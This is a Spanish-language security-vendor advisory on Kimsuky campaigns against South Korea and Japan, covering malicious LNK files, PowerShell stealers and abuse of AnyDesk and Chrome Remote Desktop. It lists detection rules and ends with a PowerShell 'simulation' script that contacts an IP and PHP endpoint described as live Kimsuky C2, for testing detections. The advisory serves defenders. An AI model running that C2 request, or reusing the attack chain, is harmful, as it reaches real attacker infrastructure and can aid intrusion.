SOC Prime Bias: Critical

26 Aug 2026 06:32 UTC

Kimsuky Usa Herramientas RMM Legítimas en Campañas del Noreste de Asia

Author Photo
SOC Prime Team linkedin icon Seguir
Kimsuky Usa Herramientas RMM Legítimas en Campañas del Noreste de Asia
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Los actores de amenaza de Kimsuky están llevando a cabo campañas de spear-phishing contra objetivos en Corea del Sur y Japón usando archivos LNK alojados en OneDrive. Una vez ejecutado, el malware establece persistencia a través de tareas programadas y recupera scripts de PowerShell para robar información del sistema, correos electrónicos y pulsaciones de teclado. Los atacantes también abusan de herramientas de control remoto legítimas como Chrome Remote Desktop y AnyDesk para mantener el acceso mientras se mimetizan con la actividad administrativa normal.

Investigación

La investigación descubrió una cadena de infección en múltiples etapas que involucra archivos LNK maliciosos, VBScript ofuscado y scripts de PowerShell. Investigadores analizaron componentes especializados, incluyendo una extensión maliciosa de Chrome diseñada para recolectar datos de Gmail y scripts usados para instalar AnyDesk. Los comentarios en coreano y las cadenas de depuración encontradas en código generado por IA también sugieren que los operadores pueden estar usando IA generativa durante el desarrollo.

Mitigación

Los usuarios deben tener precaución al abrir archivos LNK o enlaces recibidos de fuentes desconocidas, especialmente porque Windows puede ocultar las extensiones de archivo. Las organizaciones deberían auditar regularmente el software instalado para detectar implementaciones no autorizadas de Chrome Remote Desktop o AnyDesk. También se recomienda encarecidamente monitorear las extensiones del navegador para permisos excesivos o inesperados.

Respuesta

Si se detecta actividad de Kimsuky, los equipos de seguridad deben revisar las tareas programadas en busca de entradas sospechosas que lancen wscript.exe or powershell.exe. Los procesos de AnyDesk inesperados y los archivos ubicados en %appdata% los directorios también deberían ser investigados. Las extensiones del navegador y las configuraciones de escritorio remoto deben revisarse para identificar y eliminar los mecanismos de acceso no autorizados.

Flujo del Ataque

Todavía estamos actualizando esta parte.

Detecciones

Posible Archivo LNK Malicioso con Doble Extensión (vía línea de comandos)

Equipo SOC Prime
25 Ago 2026

LOLBAS WScript / CScript (vía creación de procesos)

Equipo SOC Prime
25 Ago 2026

LOLBAS Schtasks (vía línea de comandos)

Equipo SOC Prime
25 Ago 2026

Ejecución Sospechosa desde el Perfil de Usuario Público (vía creación de procesos)

Equipo SOC Prime
25 Ago 2026

Uso Sospechoso de CURL (vía línea de comandos)

Equipo SOC Prime
25 Ago 2026

Cadenas de Powershell Sospechosas (vía powershell)

Equipo SOC Prime
25 Ago 2026

Llamada a Métodos .NET Sospechosos desde Powershell (vía powershell)

Equipo SOC Prime
25 Ago 2026

Archivos Sospechosos en el Perfil de Usuario Público (vía evento de archivo)

Equipo SOC Prime
25 Ago 2026

IOCs (HashMd5) para detectar: Abuso de Herramientas de Control Remoto Legítimas por parte de Kimsuky a través del Noreste de Asia Parte 2

Reglas de IA de SOC Prime
25 Ago 2026

IOCs (HashMd5) para detectar: Abuso de Herramientas de Control Remoto Legítimas por parte de Kimsuky a través del Noreste de Asia Parte 1

Reglas de IA de SOC Prime
25 Ago 2026

IOCs (SourceIP) para detectar: Abuso de Herramientas de Control Remoto Legítimas por parte de Kimsuky a través del Noreste de Asia

Reglas de IA de SOC Prime
25 Ago 2026

IOCs (DestinationIP) para detectar: Abuso de Herramientas de Control Remoto Legítimas por parte de Kimsuky a través del Noreste de Asia

Reglas de IA de SOC Prime
25 Ago 2026

Detección de Indicadores de Comunicación de C&C de Kimsuky [Conexión de Red de Windows]

Reglas de IA de SOC Prime
25 Ago 2026

Tarea Programada para la Ejecución de VBScript Malicioso [Windows Powershell]

Reglas de IA de SOC Prime
25 Ago 2026

Ejecución de Simulación

Prerrequisito: La Verificación Previa de Telemetría y Línea de Base debe haber pasado.

Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente las TTPs identificadas y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.

  • Narrativa del Ataque y Comandos: El adversario ha ganado un punto de apoyo inicial en la estación de trabajo de Windows a través de un archivo adjunto de spear-phishing. Para establecer Comando y Control (C2) y comenzar la exfiltración de información del sistema, el atacante ejecuta un comando de PowerShell. Este script está diseñado para imitar el comportamiento conocido del grupo Kimsuky: contactando un endpoint PHP específico en un servidor comprometido para recibir más instrucciones. El objetivo es mimetizarse con el tráfico web estándar mientras se alcanza el endpoint C2 preciso identificado por la inteligencia de amenazas.

  • Script de Prueba de Regresión:

    # Script de Simulación de C2 de Kimsuky
    # Este script simula una solicitud a una de las URLs codificadas en la regla de detección.
    
    $c2_url = "http://103.77.242.187/view.php?type=apple&seed=simulation_test"
    $user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
    
    Write-Host "[!] Simulando Comunicación C2 de Kimsuky a: $c2_url"
    
    try {
        # Usando Invoke-WebRequest para generar tráfico HTTP a nivel de proxy
        $response = Invoke-WebRequest -Uri $c2_url -UserAgent $user_agent -Method Get -ErrorAction Stop
        Write-Host "[+] Solicitud completada. Código de Estado: $($response.StatusCode)"
    } catch {
        Write-Host "[-] Solicitud fallida (Esperado si la IP no está activa): $($_.Exception.Message)"
    }
  • Comandos de Limpieza:

    # No se crearon archivos persistentes; no se requiere limpieza.
    # Si se descargó un archivo, use: Remove-Item -Path "C:pathtoarchivo_malicioso.exe" -Force
    Write-Host "[*] Limpieza de simulación completa."